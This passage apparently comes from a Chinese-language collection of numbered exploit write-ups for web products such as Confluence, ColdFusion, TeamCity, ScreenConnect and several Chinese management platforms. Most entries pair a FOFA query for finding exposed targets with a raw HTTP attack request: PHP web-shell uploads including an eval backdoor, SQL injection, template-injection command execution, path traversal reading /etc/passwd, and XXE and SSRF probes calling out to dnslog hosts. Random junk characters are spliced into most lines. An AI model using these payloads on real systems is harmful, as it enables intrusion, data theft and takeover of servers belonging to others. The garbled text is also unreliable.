- }; q; u. Q% t, h/ j# hX-Forwarded-For: 1.1.1.1 o" p$ j' p9 e3 c6 [1 ^! ^8 Q
X-Originating-Ip: 1.1.1.1 h8 h& t6 L* y5 k, ]# P, h. g: F
X-Remote-Ip: 1.1.1.1$ v0 |$ B0 A* [' Q
X-Remote-Addr: 1.1.1.1
8 H$ A8 ~+ Y% {2 ?Te: trailers
+ x3 `+ e; M" ^/ IConnection: close
0 v2 Y) l% y2 U7 b+ h
E3 f: b/ y& esrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
# {# T2 Z3 x( N; H# V. W& k1 `# a; k' J7 [
" l3 u2 [( o# Y: u120. 北京百绰智能S40管理平台导入web.php任意文件上传
8 j3 {- Y Q" WCVE-2024-1253
& K. U7 k( O9 M. q* @$ {, \FOFA:title="Smart管理平台"
; I3 O: `; t$ L: q: u D. XPOST /useratte/web.php? HTTP/1.1
/ D7 X6 |% C' z" x* RHost: ip:port+ i- s0 |0 G% n6 p m
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
5 v c2 X8 T6 A2 `User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
( d5 C! |$ D& }" K3 g- cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: s2 ~' i" u- @" ^5 e/ Y4 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; F8 f" l, {2 B( _2 K% M
Accept-Encoding: gzip, deflate% d+ v0 ^; P0 t$ G0 E% C
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
7 O* y& Z( b6 | Y' O$ P+ \Content-Length: 5972 ]" ]' Z7 v% L" S
Origin: https://ip:port
+ x3 Z r; I2 H- z& Q% ~9 yReferer: https://ip:port/sysmanage/licence.php: }3 l7 q! a7 O& [" e0 n
Upgrade-Insecure-Requests: 1
% o! D7 j6 s" [( e0 LSec-Fetch-Dest: document! n' Y/ u- X" Q; o; I1 Q
Sec-Fetch-Mode: navigate
9 V8 V" w: N, N NSec-Fetch-Site: same-origin6 v3 |* k$ E! C' g; ]7 `
Sec-Fetch-User: ?14 s1 P( ^+ K1 r' Q( G* B
Te: trailers
. a6 F1 V- t; P& W$ h+ M3 LConnection: close
" b( M) M$ i8 n9 d- g1 d4 j$ O" i3 I8 ?" W' k" o6 o7 D7 w
-----------------------------423289041236658752706300793287 ?3 p. K1 Q& p
Content-Disposition: form-data; name="file_upload"; filename="2.php": I" ^6 o+ d# z! L1 U. d
Content-Type: application/octet-stream
4 r' b1 L5 i1 `( S* T! x
2 j3 ~# M4 }. X8 A( Y/ w<?php phpinfo()?>
& y1 O! T& g: y% b-----------------------------423289041236658752706300793282 E- Z, Z9 Z& w# X6 s, U
Content-Disposition: form-data; name="id_type"' n& q- m- g5 X& L1 Z" W* ~0 \
" J6 b* d& U" x9 n, Y4 Y3 s3 t1 f2 P5 y; O: z: T/ m4 I! ^
-----------------------------42328904123665875270630079328$ M7 {% P: W! @2 V, c, I9 W( R
Content-Disposition: form-data; name="1_ck"
6 [" W& E+ }; U+ K# _0 x( R: V5 M
# \' P! u" ~4 {2 s0 c% M8 p1_radhttp
2 q2 {! ~; x7 B( }" m. j( ~* d1 n' S-----------------------------42328904123665875270630079328: d" p+ q' q- X% i
Content-Disposition: form-data; name="mode"
6 s! _' p3 |. y4 @
! }4 \0 s0 w n% @2 A& ^import* F, O( x2 u: B9 q7 Q
-----------------------------42328904123665875270630079328
h. ?/ D; z' |- j
# p# C& f, k/ ~% a* d
`6 @- s( q0 v% e6 c% e- ^6 c文件路径/upload/2.php
" N! ~ V, |3 S1 e& w+ j( f) Z9 u+ s" [8 K. g" A
121. 北京百绰智能S42管理平台userattestation.php任意文件上传3 X/ e8 h6 V+ E& A1 |8 |, e
CVE-2024-1918
" d6 X+ B( e. N0 P; tFOFA:title="Smart管理平台"7 z3 L! ]* T0 x2 e6 u
POST /useratte/userattestation.php HTTP/1.1
5 K0 Y: s( o! u1 \2 Q# E8 v# _Host: 192.168.40.130:8443
; r8 `. q% P" y% ~; cCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50# {7 d" H3 `+ @! g
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko# J3 y* A! _/ u5 m5 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 L" o* _9 M; H- Y" o* s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: w' X! f3 [/ n7 k0 l
Accept-Encoding: gzip, deflate
- V7 T, f4 R, U9 \6 _Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328, K$ D9 K6 ~2 d' O9 b4 @
Content-Length: 592
* s/ E& G R* N. j$ ]( o! E6 {5 hOrigin: https://192.168.40.130:84430 x3 c' H. \/ f7 B
Upgrade-Insecure-Requests: 12 T5 N# f6 T2 q0 k9 I
Sec-Fetch-Dest: document
7 W6 d4 c) K0 [$ dSec-Fetch-Mode: navigate# E7 ^3 ?$ _5 v* k. v" y0 C6 J
Sec-Fetch-Site: same-origin: [3 X- t- j/ L% s
Sec-Fetch-User: ?1
! @5 _% e3 H3 v/ m6 h# kTe: trailers4 D2 R* v5 S7 }/ n4 \. C7 r
Connection: close o! N+ K6 u3 W6 E- X2 m9 a6 p# k
1 S) ?2 ^; b ~-----------------------------423289041236658752706300793287 x6 q8 I) b; {% h0 W
Content-Disposition: form-data; name="web_img"; filename="1.php"
/ z* V* g: B9 XContent-Type: application/octet-stream2 _# J( }4 K& L8 T" P: A) j; D2 E1 h( V
3 z/ ?) A% a2 c- h0 w3 `; |<?php phpinfo();?>! d* F+ i! w' A# v1 J u% F- ]% Q
-----------------------------423289041236658752706300793287 Z2 H, p. j+ O- [' M# Z
Content-Disposition: form-data; name="id_type"1 P: G3 N8 z- K* \/ T2 f
# j. w7 K- Y+ \8 y$ S& y
1
, ]% n# `. R- B! j& L& k+ {-----------------------------42328904123665875270630079328 r% G% t+ C* |% Q, K1 K
Content-Disposition: form-data; name="1_ck"# U* ~, a# g& J" d5 W1 h' L2 ^
: T' S. h; i: v& V! s. L
1_radhttp
_, \6 F9 f D-----------------------------42328904123665875270630079328
+ Y# t. y' T) PContent-Disposition: form-data; name="hidwel" i0 u4 q( w7 U2 B
( |! M) P( Z3 K4 rset6 l. B6 F- \ r4 G( p4 O# L3 s
-----------------------------42328904123665875270630079328
, v, l5 }! R% l2 U/ e6 k5 t! s% z6 b" A# v1 n5 ~( H/ u
% d$ \4 ~) ?+ @/ l. ~! x- pboot/web/upload/weblogo/1.php
3 H' `% T& |/ n; S8 U; N# D9 _! W% z. `+ U7 U2 j4 T3 D
122. 北京百绰智能s200管理平台/importexport.php sql注入
$ K% ?1 b+ Y5 B0 x/ NCVE-2024-27718FOFA:title="Smart管理平台"
- U* V% Z( q& j* G* x0 B% K其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()* {4 d& v% W1 Q
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.18 ]* m+ c- z, P% a1 q; C. t) D8 I
Host: x.x.x.x
# A; P! T0 L- Z1 c" W8 jCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0: k; o7 o9 _: z) ]. W9 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
( g3 R4 L9 ]! q+ d3 U% t% R6 kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 n) F z# } V" p; ^3 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. j& B3 [/ J# g" ?$ @. s
Accept-Encoding: gzip, deflate, br% Y. d& E' v- I* I3 z/ h5 e6 B: a
Upgrade-Insecure-Requests: 1
. s# C& ]4 q& }6 _Sec-Fetch-Dest: document
/ F: P) {0 j6 Q2 lSec-Fetch-Mode: navigate2 N, k- Z! |) I$ ~6 C5 C: J
Sec-Fetch-Site: none2 K: c+ R( ^' M$ R4 s6 l, t
Sec-Fetch-User: ?1& e! c, \2 H# b) k
Te: trailers% }7 ]+ b+ \9 `4 ]( ^2 v
Connection: close
- ? ^& R& z1 c5 Q2 |+ A5 d- Y" Y
8 X7 Z' V! a0 }% Z- @123. Atlassian Confluence 模板注入代码执行* U9 V, V* g- o9 K0 i* M
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"% i' N* j3 z* ]- R2 ~
POST /template/aui/text-inline.vm HTTP/1.1( K6 d! ?4 d( b% A. B
Host: localhost:80904 R' D" r4 }2 Y; V9 O$ D
Accept-Encoding: gzip, deflate, br
% f4 J4 J9 i; W1 r" dAccept: */*6 J' _. m& N( B+ w) a# w
Accept-Language: en-US;q=0.9,en;q=0.8% `8 w( C- |( }* \' _1 x7 u% G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
- K/ k7 [: j0 K# K2 c8 s2 ]Connection: close
" B( O& G. p3 Z" Q, n* R: pContent-Type: application/x-www-form-urlencoded1 o0 D% d& o5 i$ b M
' @0 k$ Z% _6 w i; [label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))9 ~! a; n: l. u v9 a; w$ ^
5 ^1 j) F+ Y4 H8 ^" C3 P
, e0 G& b0 p7 o7 A+ C* |" X/ n124. 湖南建研工程质量检测系统任意文件上传
5 N) N+ Y! ]: nFOFA:body="/Content/Theme/Standard/webSite/login.css" G: X4 @2 \" ^5 u3 F: {
POST /Scripts/admintool?type=updatefile HTTP/1.12 Z9 t" t2 ^2 M2 x, ?
Host: 192.168.40.130:8282
7 [& |: ^' O' ^( n" L. X0 f RUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
6 g1 \' c4 z$ I/ G0 jContent-Length: 72+ ]6 j$ s# g( X. M0 h, H1 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.85 R1 d$ r* T; }$ [+ R- _9 n
Accept-Encoding: gzip, deflate, br
; z: t; i8 e6 I, n. ^$ Z7 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' x1 b4 F1 n7 U9 @3 Q
Connection: close
9 z4 H3 G+ t8 }- m( ]9 @, C/ Q. N* mContent-Type: application/x-www-form-urlencoded5 a6 o3 L( v# Z+ s
+ _7 E& D6 F+ g( DfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>: \, t; p$ T" i6 T" X( S
4 h( f- h! G' O4 |
) b9 e! T% @# J- c& L6 Uhttp://192.168.40.130:8282/Scripts/abcgcg.aspx! r+ f+ e: u: x8 ]- m# M
$ [- p& z' B( x125. ConnectWise ScreenConnect身份验证绕过
. n& d- S3 J8 ]) Z$ T7 JCVE-2024-1709
) |8 T, O- ^8 k; A9 h7 AFOFA:icon_hash="-82958153"
% G, E. [, x. I. Ohttps://github.com/watchtowrlabs ... bypass-add-user-poc7 N# ^. d. Y3 E s
/ A: r" k& R4 L; K5 o& g
; h7 y: B1 `4 C+ w, u* A4 ]4 q0 A* o
使用方法
- o8 _ o: `) x) M2 vpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!9 g* |0 a, S9 h( b
4 D( \8 U: Z) l
3 C7 y( W1 y9 h8 \2 u创建好用户后直接登录后台,可以执行系统命令。3 p5 D8 E7 u! h1 _1 H' @
3 b! L" P* P4 J k2 C
126. Aiohttp 路径遍历9 y( r. i* e3 |4 n- v# N
FOFA:title=="ComfyUI"( }5 g2 F5 S0 f) f' Q" Y" M
GET /static/../../../../../etc/passwd HTTP/1.15 Q `% T8 c/ t& [5 U" t* f
Host: x.x.x.x
$ R. X. k3 y! G1 }) iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
3 B. g8 i& z- u1 \; ?% W% E! KConnection: close( p0 L0 I% Z2 ?8 X( f! |
Accept: */*# P4 P# t. l$ H) S
Accept-Language: en
% J2 [$ Q( W1 D M! bAccept-Encoding: gzip
/ Z# w: \8 N3 k/ M$ G& E2 t4 N5 |9 T
2 S" T( c ^" F8 X; Q* s* o
127. 广联达Linkworks DataExchange.ashx XXE4 H3 P% h/ E! t
FOFA:body="Services/Identification/login.ashx" x7 N1 y) I( B6 |" q9 a
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
4 A( `. V/ b- J+ N6 G" A6 I- o( XHost: 192.168.40.130:8888
# g/ {4 c6 P# G uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36- F% N' b8 }0 Z+ |# ]
Content-Length: 415. }1 w5 O6 n7 V ~4 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# w5 l$ J) Y1 V' [! `
Accept-Encoding: gzip, deflate9 D) I/ J( P! P. x, B
Accept-Language: zh-CN,zh;q=0.9
; [4 C7 I6 k4 I7 A1 K, E/ s6 zConnection: close+ I. s& O/ B2 C& M+ M0 Z
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0" {; m0 n- ]: Y, p+ D
Purpose: prefetch; z# d9 N3 G; p' W% H' v4 C
Sec-Purpose: prefetch;prerender! Z6 N0 Z+ e) s6 r& F2 \$ b
W1 ~+ g9 g/ }$ V' M0 T9 j------WebKitFormBoundaryJGgV5l5ta05yAIe0
* @' H: D3 F! }5 C/ aContent-Disposition: form-data;name="SystemName"4 o- }) E) [! w6 C4 ^
# J/ y: D% @0 t! Y4 E+ M
BIM
2 b8 m, B- M' L6 \------WebKitFormBoundaryJGgV5l5ta05yAIe0: X) N, x) Q G4 e2 v3 b; o
Content-Disposition: form-data;name="Params"
# @1 J) t2 x2 UContent-Type: text/plain
, A, S& F) z9 Y; m9 d& @0 Z5 Q1 x* [$ x' J
<?xml version="1.0" encoding="UTF-8"?>
6 T N! D# X, ]& f* u$ i9 \% D4 B<!DOCTYPE test [
- \: J! u8 X; Z/ W" \) ~7 d<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
+ l0 O7 A: e# f( E1 a]
, J: ?' K& H0 H>7 y9 ?7 b. K0 f }! S
<test>&t;</test>
0 W8 r) R9 Z' l* u1 G------WebKitFormBoundaryJGgV5l5ta05yAIe0--
5 w+ ]6 C1 |' Q' u1 U: J3 |& \
. t6 \- i' k1 d) N8 ] ^+ O. O4 A% w6 b+ f& d& c- C. q
$ @# `$ R1 I, l7 a, ~4 r" g% U128. Adobe ColdFusion 反序列化
- {1 D a# S9 Z+ RCVE-2023-38203
+ i9 x- m7 |7 O2 wAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)0 J- u% g7 L6 p5 _7 I; o
FOFA:app="Adobe-ColdFusion"
$ ], N+ z) |& j% y+ ]% CPAYLOAD
" j$ `2 E2 l& F
4 v" ~5 h4 _* f- |8 u& j129. Adobe ColdFusion 任意文件读取
! R# J7 S& A+ TCVE-2024-20767
' J M' O4 l5 S) ~' d' B WFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request") b% G& h- f# @6 `
第一步,获取uuid* _# n9 t3 G( i0 {; A
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1: L7 p9 S$ A4 u
Host: x.x.x.x" Y$ k, ]8 }8 l% {' ]2 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.365 I n! h E5 C( C
Accept: */*
. L' f/ Q$ O3 eAccept-Encoding: gzip, deflate5 K8 E! x1 a3 }8 Y" e8 `8 D) s
Connection: close
, y, w) O7 Q3 g" F8 ] b- s0 m6 r6 t: j
" o4 u2 }5 K% p& z8 z) k4 S# X9 c第二步,读取/etc/passwd文件
& _) `& j \2 A& W: P7 r0 tGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
9 v$ y! G* Q1 L4 \8 i9 FHost: x.x.x.x- Q7 d# }% V& P7 ? E- F1 E8 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36, o& `7 `% S6 {1 O" G
Accept: */*
% O6 N' M8 Q, FAccept-Encoding: gzip, deflate& R! u6 N2 g& n" Y4 z
Connection: close4 d, b7 e# H7 G i2 ^4 N
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
! y% s2 Y0 r" @6 c7 p: ^
9 G/ ?* H5 j; a7 B$ Q2 ?8 H4 f9 c
( O7 w+ m3 ^% }6 G% w; d* z130. Laykefu客服系统任意文件上传
! m: m+ T9 |, h6 A4 A8 \3 uFOFA:icon_hash="-334624619"" n0 {8 Y! q; e& v& W, t* q
POST /admin/users/upavatar.html HTTP/1.12 ]/ E5 w# F- e' G1 H, M! D
Host: 127.0.0.1
' \% d6 Q {$ G; e# CAccept: application/json, text/javascript, */*; q=0.01
( l: j* e. Q' K; zX-Requested-With: XMLHttpRequest8 Y% K$ D. X: x7 @8 B" U
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
) k8 s5 v( K$ ]" s: iContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR7 d4 \( w5 a( X' B, N f! @
Accept-Encoding: gzip, deflate: j2 n: e9 [$ ?( D- A+ }3 a; n
Accept-Language: zh-CN,zh;q=0.9; W8 d) U* V; r2 r6 e) f0 E& m
Cookie: user_name=1; user_id=33 [2 R; \) _1 f( @
Connection: close
. V1 C o) q1 f1 H8 B$ `/ [, q: F, I& U! v
------WebKitFormBoundary3OCVBiwBVsNuB2kR. {: B% B5 m0 S' P6 ?/ W2 k
Content-Disposition: form-data; name="file"; filename="1.php"
" \! A r" }8 A- P/ x8 V9 WContent-Type: image/png; k2 e, C7 A! a2 z
9 ~8 M+ f3 U! y
<?php phpinfo();@eval($_POST['sec']);?>
4 Z2 ]9 t8 u+ O* y------WebKitFormBoundary3OCVBiwBVsNuB2kR--/ d. n/ P3 l1 P, B; R0 j8 Y
/ y1 p7 x0 o# g/ i' d/ L1 u
* j4 ^5 p r# W% r& ^% J: `8 O131. Mini-Tmall <=20231017 SQL注入. r* j, ?" B; P. W( u
FOFA:icon_hash="-2087517259". P) J3 x# l) k' }4 _" X0 q+ U0 T) R
后台地址:http://localhost:8080/tmall/admin( ], q9 }! |: F5 ]; p/ ~# G
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)0 `9 Y* p3 U& h0 C. t
Z' ]8 V6 W9 U) L- k132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过0 P% i1 h) [8 w5 {5 V: M. G4 F
CVE-2024-271984 a; Y$ i& ^# N2 e
FOFA:body="Log in to TeamCity"4 G/ Q. X& H- C- ^' ^
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
% d- |6 W/ G' GHost: 192.168.40.130:81115 q* y q! r3 C! b9 s% \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 V H7 @* o) O$ a/ }
Accept: */*" U9 _. @0 F0 X/ Y
Content-Type: application/json$ D, {% R9 x E2 [# i0 o
Accept-Encoding: gzip, deflate; W! n2 ]4 c8 ~9 w
, D2 G$ s5 w; \& Z+ U2 F9 ~) }# ~
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}3 d6 R! b& w. R7 O2 v
9 M' ]9 H% r! M9 n
# m9 U- a' b) X. dCVE-2024-27199
6 T, T$ B8 L' h" g! O# Z, ?/res/../admin/diagnostic.jsp
( a+ D% T8 C4 \+ s1 a/ d X+ D8 p/.well-known/acme-challenge/../../admin/diagnostic.jsp
, ]6 O& M: J/ e3 p: D/update/../admin/diagnostic.jsp: y% r. n- I1 v: C: T, X! ^
% @) `3 R4 k5 c7 C7 U
. t; W2 ?9 h+ E) V8 N$ }! r: C% r
CVE-2024-27198-RCE.py- i% \& T& ^9 N/ V4 `+ @: P. A
7 M0 Q" K. w$ h/ L
133. H5 云商城 file.php 文件上传! K! O' O; w9 o: Y6 j4 T
FOFA:body="/public/qbsp.php"9 F/ X% \; F8 l% Q6 L
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1, O# b) r2 T. P
Host: your-ip! J- D3 L( U+ r1 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36$ _; X+ ^# w4 A
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx( V4 k+ `- _% f' R: ~3 [. Q/ J
/ x& E# A3 u( x+ Q
------WebKitFormBoundaryFQqYtrIWb8iBxUCx! ^( t/ V4 D: t
Content-Disposition: form-data; name="file"; filename="rce.php"3 y* p1 \7 }! A9 Y) V7 L* q1 m
Content-Type: application/octet-stream" I) U+ ]- N# L6 j2 ]
5 [( {+ s7 e6 O3 r
<?php system("cat /etc/passwd");unlink(__FILE__);?>% [# @7 w0 {& z3 Y
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--6 E" ?; l9 a2 }8 l) L4 i& T0 N: i6 Y
. J2 T7 D7 \" [( _# ~" m$ O7 [/ T. ~* P6 e! m; a; Z- B" l/ p, E z
0 ]) _, j0 y( G3 g134. 网康NS-ASG应用安全网关index.php sql注入
+ `) v u: K' S1 WCVE-2024-2330
7 c8 H9 F/ d+ h1 c7 aNetentsec NS-ASG Application Security Gateway 6.3版本
5 t+ Q9 X9 ?4 e1 B8 LFOFA:app="网康科技-NS-ASG安全网关"
' `( u! K# d v- U9 n+ y- J' vPOST /protocol/index.php HTTP/1.1
6 b2 M) l& Y1 t: _* Q6 {Host: x.x.x.x
$ k' J$ Q4 y7 q4 w( g F6 pCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de7 T# [8 f4 L& V! t: \5 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
" Y! V- Q0 ^, a$ IAccept: */*
3 e6 {' ~8 ]! O% ^ Y% TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 F+ H# [6 R# M4 e4 qAccept-Encoding: gzip, deflate6 d$ S; k/ t8 `7 q
Sec-Fetch-Dest: empty3 i: K" r) m" z' x9 W% L
Sec-Fetch-Mode: cors
: W6 w8 f" Y u/ ^Sec-Fetch-Site: same-origin; z& X3 k0 l2 y4 f
Te: trailers1 U; |1 u' F& { ~: M
Connection: close
$ a2 j% ~9 x3 D) c: g# n7 E7 F% {' uContent-Type: application/x-www-form-urlencoded
+ C+ |& p* ~1 J# k5 tContent-Length: 263
% _ a: C( u( i% U- _* m4 }
9 ]. K4 X, ]5 Cjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}4 Y+ d# G) n" v$ [! R5 G
) i6 j. P! i. W1 }" @ }9 D O: Q, \4 B" w
0 X) @* }* |, ^$ o! R S+ _1 P135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
' X6 a% }" z8 A& [CVE-2024-2022+ U' j$ _' {. |9 _* K
Netentsec NS-ASG Application Security Gateway 6.3版本
: S' K! T$ s, M) A1 G" [3 aFOFA:app="网康科技-NS-ASG安全网关"
% m3 [! x. I" y/ W$ NGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
3 D, X% P9 q) S& ~; M1 {1 uHost: x.x.x.x
' k) p& o: x) B% A* L0 v- ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 P% n/ {! Y( n7 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 O% Z+ P; N" H2 d9 w$ HAccept-Encoding: gzip, deflate
- ~+ h* F* f/ c6 }5 X; BAccept-Language: zh-CN,zh;q=0.94 _8 G1 C4 \7 t" G+ a8 P: T) v
Connection: close
9 ~ b# W$ S$ t3 ` \4 [0 g5 t3 g& R; h
, [* `- W* N6 H# k; [) l136. NextChat cors SSRF2 G3 N4 y% Q* F6 |6 q6 {* K
CVE-2023-497856 W4 r& g a# d* O8 s
FOFA:title="NextChat", g& T2 A* p2 r
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
. m! H @3 K1 nHost: x.x.x.x:10000" I2 @" b0 y7 C& @; m- J9 _) k, D' e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; Y4 s8 s3 Q& }& q$ h0 z
Connection: close# g6 y; Y. w- f. r( p& I
Accept: */*7 R7 d6 H) _ G! g5 K& P
Accept-Language: en' Z( w$ U. i3 ?6 m, J/ I. O0 J5 O( H' y
Accept-Encoding: gzip7 g" L' f# b/ J5 i; F. X2 F: I4 J
% S0 h$ V% v; v- z) ~" _9 Q6 l) Z$ U# m# X5 J) N* ?
137. 福建科立迅通信指挥调度平台down_file.php sql注入
! z* i0 }, g$ n* {CVE-2024-2620( G4 S- |; N; a5 X2 d* E
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"' X: h- s% X+ l7 V
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
% t# ?! b+ Y. E8 LHost: x.x.x.x
$ d& C, y$ a7 I4 M% C: KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 [/ w( ~; j. f# N. c3 \! C* a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 |6 g$ q# s" j6 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 T1 l' j6 O9 Q
Accept-Encoding: gzip, deflate, br
1 p0 ?5 c5 A! Y- FConnection: close
* f* w5 H3 P1 L( }2 m x( e% N& yCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj v* b3 Y7 `3 x1 m
Upgrade-Insecure-Requests: 1
0 g9 C3 `' v1 a4 K1 g, l% T; q! C# X* {+ F- }) r
/ n4 V. Y! U& j R138. 福建科立讯通信指挥调度平台pwd_update.php sql注入& f9 {1 q4 d. i0 B# _
CVE-2024-26211 s! G9 y/ y* h
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"9 k3 D8 I( z+ L/ \
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
' u% N9 A. C9 N I& s; tHost: x.x.x.x, {- c$ e2 ]$ ?: ], X6 }: A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 O: g! _/ d9 c. W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# o$ w% z, b* Z( W/ L& r: qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) ]9 ~( P, T/ z' M9 r" Z. t) GAccept-Encoding: gzip, deflate, br5 Y) f$ l; t1 [6 ]* s9 l% s
Connection: close7 a; y5 Y) @6 G6 w
Upgrade-Insecure-Requests: 1
/ k' Q6 ^/ I0 s$ Z4 K, k x x# \. L
0 M- m* a* w6 q- T5 G139. 福建科立讯通信指挥调度平台editemedia.php sql注入! s0 ~; s4 V8 N1 d/ |
CVE-2024-26227 `' `# V$ o2 N/ h) r
